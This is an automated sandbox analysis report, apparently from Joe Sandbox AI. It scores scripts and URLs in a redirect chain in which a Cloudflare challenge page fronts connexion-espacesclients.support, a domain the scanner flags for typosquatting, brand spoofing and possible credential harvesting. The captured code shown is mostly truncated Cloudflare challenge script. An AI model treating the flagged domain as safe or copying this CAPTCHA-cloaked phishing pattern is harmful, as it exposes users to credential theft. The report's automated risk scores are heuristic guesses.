| URL: https://www.mobaps.eu Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://www.mobaps.eu |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Cloudflare Turnstile (CAPTCHA/challenge) implementation script. It contains standard error handling, Promise implementations, and type definitions. While it uses some complex code patterns, these are typical for production JavaScript libraries and show no signs of malicious behavior."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge configuration code. It contains translations and configuration settings for Cloudflare's security verification system. While it includes references to external domains (challenges.cloudflare.com) and browser checks, these are standard security practices from a trusted provider. The code is not obfuscated and serves a legitimate security purpose."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"redirecting_text":"Waiting%20for%20%25%7Bplaceholder.com%7D%20to%20respond...","favicon_alt":"Icon%20for%20%25%7Bplaceholder.com%7D","turnstile_overrun_description":"Stuck%20here%3F","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_description":"Send%20Feedback","footer_text":"Performance%20%26amp%3B%20security%20by%20Cloudflare","time_check_cached_warning_aux":"%3Ca%20class%3D%22refresh_link%22%3ERefresh%20the%20page%3C%2Fa%3E%20to%20try%20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","stuck_helper_explainer":"If%20you%20are%20stuck%20on%20this%20page%2C%20your%20device%20or%20connection%20has%20been%20flagged%20as%20a%20bot.%20Try%20resetting%20your%20device%20or%20internet%20connection%20%28e.g.%20router%29.%20For%20additional%20assistance%2C%20contact%20the%20site%20owners.","page_title":"Just%20a%20moment...","cookies_missing":"Please%20enable%20Cookies%20and%20reload%20the%20page.","success_title":"Verification%20successful","interstitial_helper_title":"What%20is%20this%20Page%3F","human_button_text":"Verify%20you%20are%20human","browser_not_supported":"Browser%20is%20unsupported%20and%20cannot%20complete%20verification","interactive_running":"Verify%20you%20are%20human%20by%20completing%20the%20action%20below.","stuck_helper_title":"Stuck%20on%20this%20page%3F","check_thirdparty":"Please%20unblock%20challenges.cloudflare.com%20to%20proceed.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","redirecting_text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","browser_not_supported_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Your%20%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%27challenge.supported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","js_cookies_missing":"Enable%20JavaScript%20and%20cookies%20to%20continue%20verification","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20Try%20a%20different%20link%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","location_mismatch_warning":"Website%20is%20not%20accessible%20via%20this%20address.","review_connection":"%25%7Bplaceholder.com%7D%20needs%20to%20review%20the%20security%20of%20your%20connection%20before%20p |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "Script contains multiple high-risk indicators: heavily obfuscated data in parameters, suspicious domain pattern ('connexion-espacesclients.support'), and complex token/challenge system typical of potential phishing infrastructure. The extensive encoded parameters and challenge tokens suggest sophisticated data collection or validation bypass attempts."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "connexion-espacesclients.support",cType: 'interactive',cRay: '8ec290b6d99f43fe',cH: '9HWcBqF7sKomTYKahG2RNsY9ua2OrzFl.Ursbt__IRI-1733218512-1.2.1.1-4kVKumfnZmuaiFyxNlF9beCde_GR3g2LVKv0cHSmS1kiRwqJ8uJ40cXKfmGVBwrH',cUPMDTk: "\/gkm?__cf_chl_tk=HMcOtczpVNKq1LZ2PEe_sPkmv4oZJN2KAmB0b7UlqY8-1733218512-1.0.1.1-2j_C1.6MHAcvajR7jZtbc3Qd1wyTP.d3NvYUF_48SQY",cFPWv: 'b',cITimeS: '1733218512',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/gkm?__cf_chl_f_tk=HMcOtczpVNKq1LZ2PEe_sPkmv4oZJN2KAmB0b7UlqY8-1733218512-1.0.1.1-2j_C1.6MHAcvajR7jZtbc3Qd1wyTP.d3NvYUF_48SQY",md: "Vh30lsLOiJkn0kaOQepOUcBbKC44XUuPNPASz1ujRuQ-1733218512-1.2.1.1-OqXucgjNu1pdUnem2ZJ0xEJgBNWnq0FzrJmag_1WI372SdgqiMaNtST0uvh5hscWbOpgFPHwhMxKGX9SO3eYHVGwwVbaRcZCDiEVnaDOQvG81FbsldAOb9Ie2ngytEl_GnVzn2SEMTOSv8g7HgdguzdNQM8ujXeBqLFOUeuFjnHCCBIrVmSeijYSLTQ.wfNbaVM05bND2oOx_v._n1jk2J8.BMuujWz8B1rDlpNXnyPley6ITA_UpT.cXKgzH0E3.62Jv6YJB9V1lsCOeBRiG06_Q1IArnOOmiwH2C4JDV4ooSkgbZyUn.qw3MDtojCJA5SewsfQxhZAVpn0ZtM8Xe3gVpcDvYfIelxRUj74xc2n6Slk68kbOYMR9NCBuifvcLT3DydS8TSB9SHcFsgmxMBaCOMksIOUb6eVaY0EGELYfQUQ30YZ0rnkuwtaDUunOmaeJrbcVj6P6NvBxO25iio.9GbGTjuaWjRC8qLDlKO1hpWSFDlBbGFUzQtIvsyOKIw8dzk0hW8uPe8j55UhX88y9Z5peDBgDg1GozL973aRBdIMcUHLvT.fDqINDbWqOwQQiJAES2Q9kk7AuABiIk08nldQy_VpcN5WyheISAS3wD599X035joFSklQCwIhGyh6KAZiemTA29R.MFn7d0QYCP743uDT6.whW2QFG9nOM.mrqxIukk5w6UAZEwGDlRwPgVNxi_zMQeQWfRq0eIVeS9QekS91evp8KRhK5_lrsvUxkZlzhhulrOseUrTTqnh7r6P3t4t5koGKKP6g6fJfIb7vNhUJfxHtGyQ4JLBfE.SZVvrASMEKgGj7bTFQQHXMsO8nvnfdcL2J2L6Txdo.YDDu9IhFDUc.KxDPa.lnGqajn12wwcNXqAY_YNE2vGfylIMY0Wa8hdnLC0GRGakL0JhrfPCk6ygUIinRVd5afmbVLM7Hq5vuxlRToU5a8kL5chxajpnSGYctmsIaWc9A9js.CND8HzjFATAYCkrMO644or5WZrEd504XMpZ5KrTqR9ogyghAkbZa2JW86R6E.3BbxjMbWNWwOFT_RQR2ygWfoY7VugYqb12HufHaqj1gOgEp2sDzpBjCfRHT2VmP9ZlDZm_VpvUVOVtV4HLcBv0nTwbr96C1oRGjNHP_c3Xqs1N4SLdDtZ7.x1h1V35DZ8ewko5FP.34idGZItdmhoaZTUy8yyndbWgXGs0McdVUqYKqcmcH3MuUCDVRlydIXldm6Ejeo4xKoyz5aj1OizJJ.KPQCDTpCUC3UFQA2foohKOWrInIHI_Zx1WMiuUm4bDP0u_iIul8GJ2UZU1EvVsHUe4aN5maVV72cNY5efoBlVIPKhyN5xRwlXdO2bXMMGckNp0G50_qSglEuCmsjeQ1hCp2WIqpcuo1CVnLEGXi3KVsm9Yrykxe6Zsa3FmoRT3GpYWzhea1Lh1v60OwxCafgIe7DX0B4WkMDz4_IRhA60OtQFvMj5bvPQsQTRG5UmvCZ9SQwe.mTrxafwKIVhJGunweQUNgLtqbCAeHwZPgEQnQ2B3iIsznBj8iXetrfTEFl1J2pHlMwUWXJflcAXJH0F5s63PwKVDgUxJNZADvffPtS0NOgwC_hRDDfCX2XDqre4bDkup87wnEjl5DiDW1NCqfu8cQBjKP.WRu5FO9hO8NnRyJMZUjwlzACWmn5zRBlsK.ei_JShFZxrXUjYSPGCTVXHR9PxsLIxEV.MaG8jvsJv_M6vzeyWj42C5rIyF2vODmS6VqKB10cX22Vg4pfsm1lppQFA003ONFdtu2jcCJi4mtvdFJSUdUfrosiLCRu4XARMTScjZrkkJdULTp.8JMrOmnfKmj1MCvboYiUX4mu5An1_1Xv.fcM8hzW2FOufH.1O8s8sTdvilqKIZuJAr9yaGSMIO85RZ7",mdrd: "2t.UoRdhWrqszarLIrcssvsG.3pu6k2vJa0BeGi6yxM-1733218512-1.2.1.1-_Pfew9AMtQEvxiTg2IcdmXjeBDCTcNtltn5x0UCGkME.AqDJU9sj8xeHpB.V8zjQ.LsND4etGG2slSO2wicsHGr0OqUBxZFsBT.cfz9Cdj.RpmUkQdetUOGFaZzL1EvDxGanyXBOyIDaOG5Bmp_DvSGlo1UCSyr88vhw.RRQbOQvokKyMVatsAG6PuNpRqA5YxDZR8Sb5aVVOzA8Jgn4pm86YyG47GOyRZwSTST_Hl1ggZS17NttkFAAkUjElmed3txdP1lBqwVTBLQHP2NGN.lr44bzZk0KISQhuYSRgTxSQi_JZC0ZpPlo21dBRki7se9xwoszzxA1yF3T3orw2zoFdz2n5b.MR9WA7ZM3SRqe1awsVotVgIqGW.5E6oxI0iueuU5l8UxRf5aiSMf2KAkvB0znZBvLLQXVyMWZmBMNnkwiHgmwUaTpXFybS6s0HSaKiPbav8zuj7J9vLt7blcwcUbU73dlmsqRtU7Sz3JblTuwPOgO9T6hR3l4NtA7QW2Ks_zvlbJy3hxg2Gq0WZxDDgvsFOyqFXTvge0poIpgcWV1vP3p5TO9jysFTZiOK4POVMl76P0SeiMqXtozbblBNY6i.QiYReNLnvDFUBMGx33rVhySYOmK8BFXQWzl4TMN0NRjKSZl._b13XbDZCbfD.gB.Ew_VPFGhIjJ_y5jYMlKwRrLwUrZ.oaWuwdXc3iRg3BFSHvjnjoWvcevYzdR8m3BD3YhHAKMuSwXOS7BQjJ79C5XNsNrIwB4xsWTlLRIQkH1PHcMlBBS7GHzhdpxWqwab.xkaAPpUQrbdOsNCFBD3yL6.8VltnlAJDy.4w3ES6_EALr6ehshUBE7gTVKzNrWJq7P1AFknliIrGXeFXrkgycSTO8QcW1UYKfIPPhaBdNabunNuYtR7My5O4wK3jsnQzadRQS6fIS21KdZRrLqibcltLXUg3xUXpdZPp_QHpH0iX7pelrXddNP91Nz.xnj4Y5nJFZc6HcOkO29hbl420YdwxpyCT7BtifVwpmSlCND4LgV2NjOagwQolV58ieGN1G8r4QkrZQnu.RW2yapmMnNCPrtuXn4vUFF8NHkGqhM_NhHD8bqvJ0tXMsDPdcr.ePdq7bv6wBzjmAwDmXyW_r9ILlhsVoI2MZIr5nAzTUgHrhiVqsWej1.c5YQU9KMBd9HfViXGQPWmtllLRz423q.8rlL41Eh.16WS4pgC.U7T128hUz53CedMOFMibaCcWoP6bjUfvZN983IXSErdxQinb8lurksOqRI5yqyIAXALaEasiI0vhOOanwEg |
| URL: https://connexion-espacesclients.support Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://connexion-espacesclients.support |
| URL: https://connexion-espacesclients.support/gkm Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge/turnstile code. It contains obfuscated code (+3) but is from a trusted domain (Cloudflare, -2) and serves a legitimate security purpose (browser verification, -1). The code includes standard challenge parameters, translations, and security verification logic typical of Cloudflare's anti-bot systems."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"turnstile_verifying":"Verifying...","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_timeout":"Timed%20out","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_footer_terms":"Terms","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","turnstile_success":"Success%21","testing_only":"Testing%20only.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_feedback_description":"Send%20Feedback","human_button_text":"Verify%20you%20are%20human","turnstile_refresh":"Refresh","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_failure":"Error","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_overrun_description":"Stuck%20here%3F","turnstile_expired":"Expired"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eU,eY,f1,f4,f6,f7,f8,fk,fw,fC,fD,fE,fO,fZ,g3,g4,g5,g9,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1145))/1+-parseInt(gI(938))/2*(parseInt(gI(638))/3)+parseInt(gI(1244))/4*(parseInt(gI(1825))/5)+parseInt(gI(773))/6*(parseInt(gI(911))/7)+parseInt(gI(508))/8+parseInt(gI(1115))/9*(parseInt(gI(1757))/10)+-parseInt(gI(510))/11*(parseInt(gI(1643))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,179126),eM=this||self,eN=eM[gJ(899)],eM[gJ(1793)]=![],eM[gJ(1517)]=function(h3){if(h3=gJ,eM[h3(1793)])return;eM[h3(1793)]=!![]},eU=0,eN[gJ(1828)]===gJ(1738)?eN[gJ(805)](gJ(711),function(){setTimeout(eX,0)}):setTimeout(eX,0),eY=function(he,d,e,f,g){return he=gJ,d={'UBIkF':function(h,i){return h-i},'KIgYz':function(h,i){return i^h},'NlpSk':function(h,i){return h^i},'hNkCT':function(h,i){return h^i},'KSQDL':function(h,i){return i&h},'lLALM':function(h,i){return h+i},'IGLbj':function(h,i){return i===h},'Wbhxb':function(h,i){return h===i},'yLKfj':function(h,i){return h&i},'HpRnu':function(h,i){return h-i},'GdqLC':function(h,i){return i^h},'zvykF':function(h,i){return h-i},'WmGVn':function(h,i){return h^i},'IGFVd':function(h,i){return h<<i},'OOLEE':function(h,i){return h>>i},'SoxYp':function(h,i){return h>i},'ykxCv':function(h,i){return h<=i},'qNepI':function(h,i){return h>>i},'PaXZi':function(h,i){return h*i},'ByuZp':function(h,i){return h+i},'vJNjc':function(h,i){return i===h},'VrYOR':function(h,i){return i^h},'tprSG':function(h,i){return h^i},'sqUUi':function(h,i){return i^h},'AfTGP':function(h,i){return h(i)},'TNDrN':function(h,i){return h|i},'dJLCq':function(h |
| URL: https://connexion-espacesclients.support/gkm Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify you are human by completing the action below.",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is a legitimate Cloudflare challenge script used for security verification. It contains standard postMessage communication between frames, interacts with a known trusted domain (cloudflare.com), and implements typical challenge-response security patterns. The code is not obfuscated beyond basic configuration values and uses standard browser APIs."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'zylpi',
chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '1/kVL2t161R37ZZrj_',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ec290ec08fe727d',
cH: 'ttzQEMAGLz9aLWqwjQNxP6364s0AUcXtiPP6Tb5K_yQ-1733218520-1.1.1.1-grwHc67jjCAEAg7PyrC4GifW5S0z3Ns4AQrKw2bC0vvWb8djFzXP1Q4GFO2qwNsh',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'ey3tpfAiapRgXtZW8d4aSx97CD5p_bzmVKooSHhU.h4-1733218520-1.1.1.1-Y8jPvLXRT4IkrdchcfqohIv2s5FbSn00P4Kj7wgLmaThlq7duCLeZLwfbBQQQItpgbBNhJrE7rJaMTHor0kXs3Z46y5XZUtRcDHc9IrIQUcB.QbMeZJrO2NWLDFvKpSNYuxkF_ESu8_x2HvIo05YPAFWkHVyRbsiRjbm2tCJDrGFqyAhWc0y7rxECUM7H.3FtmmCaPbmdOvBXRT4yqWkKOFzyDZNesK18xkF6.T._yqh5VZE1P9j4DX6_aIA1KHuH_L6SDXTqV1R8ZGwRGEZaJYo54enC06ZOgVTDIFjdjX07MwG9AjJtRuqElFVzSsdNXegybKndoRQSvC08k3nPJ_r2AGwFqbQ9QQq8Wws6kI8dCZHAvJlpyxpusn9WFCSp5PVO3Q7oBMAijWgn_skoKDscjYsCan_4RrjIl.T0gVzOL8Oxr9xRrIE6SAlIBIuqg_nVixemPxtN8Ufbgg1NmJHRQxgPUwM0UyTdwwyJqYfWGvV12KtI00R96.48zbSbjrI75TGD6lhcSVGoTUMjqSmT_6HTkxqKsuT7hobEbh8JF8uArIswuj3UNnPc2Cw9Wd4zKBPYoPYPs9qt366JQJ3e97vsp6RjQ5siAeITJ2wiyJW.BImb4A5pAMqIKBgYlnjUPWPi33HAltOUz7EGD07V3WiJX2O8EVpk4oIqb0R.MEmwwl1B_Q6gXyr1C4b5AaMLaymwN5OqJDTqZo8lpuL5xRc3PS4MYYSZ1d1CoVB9Zk7Q0ep4Ke81_8qUP0SJpB6ZzJ9O3enleqH4SxGq.rF4UpIioLaJgStp5F2YJ9RcicJ8u874tfRZRlxvn4Y2fUVa4EXcQw4XpCwVk501vnW_GV9h7mL3XZ2m8BRa4477DKq4gRf9Bh6z1coama_JKpsHvq2FL7dGKYmNA1UqXFwJ2T5e472Ar9eWL70v9zVevTx4.LEr7q6LZsv3WRrPqRPCyM4FghSRLGHWw_u_qIIZV0NoGipXAax9kM_B0tWFAK8fLfzBc.fMYw5ySR9VwjRHUi1PlPIPeEEp3Z0GxCuJgFUDjiwh5vWkT2KdurfZwA5BYGO5BllHjd57k4eeT9VsEBZRD15l1J5ujZgj9wk8HU35_q1Xi6r1RN_oFrljIIKcwYKQ.G_ZxjwnDzBm0Nvtr_UZfa5lX0XqFw.COZ.hgspqoYDoAuXtSZJgXEeqEu0mUKitXw3yeiJpEZTW1SiXbFjq3twneuapgO10Y2ZlQM9tAt4ScZokLXSua5SK_75K0CQ.LTq225bAz572xXGMxcNlAZVz4il2iIk0ghJBRpbbvnEjhyQPoAfh_59kMOWoFDlkqHX5K2SVw0Kz1oZo3SjOWpwFfn4OT4w8A',
cITimeS: '1733218520',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'zylpi',
nextRcV: '1/kVL2t161R37ZZrj_',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://connexion-espacesclients.support/gkm Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://connexion-espacesclients.support/gkm Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "Script appears to be Cloudflare's DDoS protection challenge script but uses potentially risky practices: creates hidden iframe, injects dynamic scripts, and modifies DOM. While from a legitimate source (Cloudflare), the dynamic script injection and DOM manipulation warrant caution. Base score of 6 (dynamic code execution +3, DOM manipulation +2, iframe injection +1) adjusted down by 2 points due to legitimate Cloudflare context."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ec291785bdd42a0',t:'MTczMzIxODU0My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "Script shows multiple high-risk behaviors: 1) Uses obfuscated code through base64-like encoding and multiple string concatenations, 2) Contains bot detection evasion logic, 3) Performs form manipulation and automatic submission, 4) Makes suspicious XHR POST requests with custom headers, and 5) Includes page reload/redirect logic that could be part of a credential harvesting attack."
} |
